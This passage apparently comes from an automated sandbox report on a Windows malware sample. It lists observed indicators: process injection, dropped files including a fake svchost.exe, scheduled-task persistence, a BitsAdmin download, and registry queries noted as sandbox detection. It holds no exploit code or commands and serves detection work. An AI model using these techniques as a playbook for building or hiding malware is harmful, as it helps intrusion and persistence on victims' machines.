Mon11bc113a5813.exesetup.tmpBPB6ZJQKq01MUb8AG050pNjq.exe4mulY6HX0OKjNh4y5va_iEdo.exepowershell.exeEASS.exeservices64.exedescription pid process target process PID 2280 set thread context of 584 2280 Mon11bc113a5813.exe Conhost.exe PID 5008 set thread context of 4728 5008 setup.tmp Mon11f55cde4ec30.exe PID 5872 set thread context of 6816 5872 BPB6ZJQKq01MUb8AG050pNjq.exe BPB6ZJQKq01MUb8AG050pNjq.exe PID 5856 set thread context of 5560 5856 4mulY6HX0OKjNh4y5va_iEdo.exe AppLaunch.exe PID 5452 set thread context of 6980 5452 powershell.exe cmd.exe PID 1124 set thread context of 3764 1124 EASS.exe EASS.exe PID 3152 set thread context of 676 3152 services64.exe explorer.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exeConhost.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\index.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\view.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe Conhost.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\liblogo_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll autosubplayer.exe -
Drops file in Windows directory 31 IoCs
Processes:
msiexec.exeQPeacnpa5OCyBgRir69RuR8o.exexWDw4KvnprXoiUalqAVdu3zs.exesvchost.exeQPeacnpa5OCyBgRir69RuR8o.exeWerFault.exedescription ioc process File opened for modification C:\Windows\Installer\MSI579F.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFC620C330F12ECD5B.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI68F8.tmp msiexec.exe File created C:\Windows\System\xxx1.bak QPeacnpa5OCyBgRir69RuR8o.exe File opened for modification C:\Windows\Installer\MSI308A.tmp msiexec.exe File opened for modification C:\Windows\Installer\f7afdf0.msi msiexec.exe File created C:\Windows\SystemTemp\~DFB7CDDEB96D6644BF.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI5CC1.tmp msiexec.exe File created C:\Windows\Installer\f7afdf0.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI34A2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3D7E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4985.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\System\xxx1.bak xWDw4KvnprXoiUalqAVdu3zs.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\SystemTemp\~DF74A747C3653A3B49.TMP msiexec.exe File created C:\Windows\System\xxx1.bak QPeacnpa5OCyBgRir69RuR8o.exe File opened for modification C:\Windows\Installer\MSIB3E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI87FD.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF040A9E32DF7D854B.TMP msiexec.exe File opened for modification C:\Windows\System\svchost.exe QPeacnpa5OCyBgRir69RuR8o.exe File opened for modification C:\Windows\System\svchost.exe xWDw4KvnprXoiUalqAVdu3zs.exe File created C:\Windows\System\svchost.exe QPeacnpa5OCyBgRir69RuR8o.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSI382D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI601D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6DCB.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\System\svchost.exe QPeacnpa5OCyBgRir69RuR8o.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4656 584 WerFault.exe Mon11bc113a5813.exe 232 1416 WerFault.exe Mon11991188390d59.exe 1448 852 WerFault.exe Mon112c3d79b6fdf8.exe 2004 4516 WerFault.exe rundll32.exe 232 5232 WerFault.exe 4.exe 6152 1248 WerFault.exe Mon1190ed9443.exe 6592 2672 WerFault.exe Mon11a22bde2b.exe 5176 3056 WerFault.exe Soft1WW02.exe 6708 1452 WerFault.exe Pro.exe 5332 5856 WerFault.exe 4mulY6HX0OKjNh4y5va_iEdo.exe 3004 3700 WerFault.exe WQ_0DNHwegoB5QOHvlIZntSr.exe 4296 5688 WerFault.exe HGnD7vZ80Dldb3sA9NYHS6wO.exe 4760 5204 WerFault.exe p9IkKDDHEvPP_0EBsFu2v6aq.exe 3632 2964 WerFault.exe setup_2.exe 6928 7040 WerFault.exe K0j8f5iqbfnfHvcNjJcr34Ek.exe 7524 3720 WerFault.exe 4Uf7hX9wKWamDH8f4X0RB_qb.exe 6120 3500 WerFault.exe tDQQVMK4kh5kC_VXdu6mwGw2.exe 1568 5500 WerFault.exe W2JFSO1Ax2gZg76M0IGV9hjG.exe 4728 5204 WerFault.exe GBI_yH9a9U9c0kT8e_JoFRwy.exe 4564 3308 WerFault.exe GcleanerEU.exe 500 6584 WerFault.exe GcleanerEU.exe 6208 7136 WerFault.exe rundll32.exe 7028 2800 WerFault.exe rundll32.exe 6312 5052 WerFault.exe gcleaner.exe 6904 3000 WerFault.exe gcleaner.exe 7376 3764 WerFault.exe EASS.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeCrowdInspect.exeWerFault.exetaskkill.exeWerFault.exeWerFault.executm3.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exefLt5aaWDMdJHJUJsdaAbuivD.exeCrowdInspect.exepowershell.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CrowdInspect.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier taskkill.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cutm3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 taskkill.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cmd.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 fLt5aaWDMdJHJUJsdaAbuivD.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CrowdInspect.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString fLt5aaWDMdJHJUJsdaAbuivD.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 taskkill.exe -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1944 schtasks.exe 5740 schtasks.exe 5140 schtasks.exe 7656 schtasks.exe 1508 schtasks.exe 860 schtasks.exe 1912 schtasks.exe 1500 schtasks.exe 4140 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 6916 timeout.exe 2984 timeout.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 56 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exemsedge.exeWerFault.exeWerFault.exeWerFault.execmd.exetaskkill.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.executm3.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU taskkill.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cutm3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS taskkill.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cutm3.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 7584 taskkill.exe 5652 taskkill.exe 5716 taskkill.exe 456 taskkill.exe 6152 taskkill.exe 676 taskkill.exe -
Modifies data under HKEY_USERS 51 IoCs
Processes:
sihclient.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\WnfLastTimeStamps\WNF_LIC_HARDWAREID_IN_DEVICE_LICENSE_IN_TOLERANCE = "1634563806" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Set value (int) 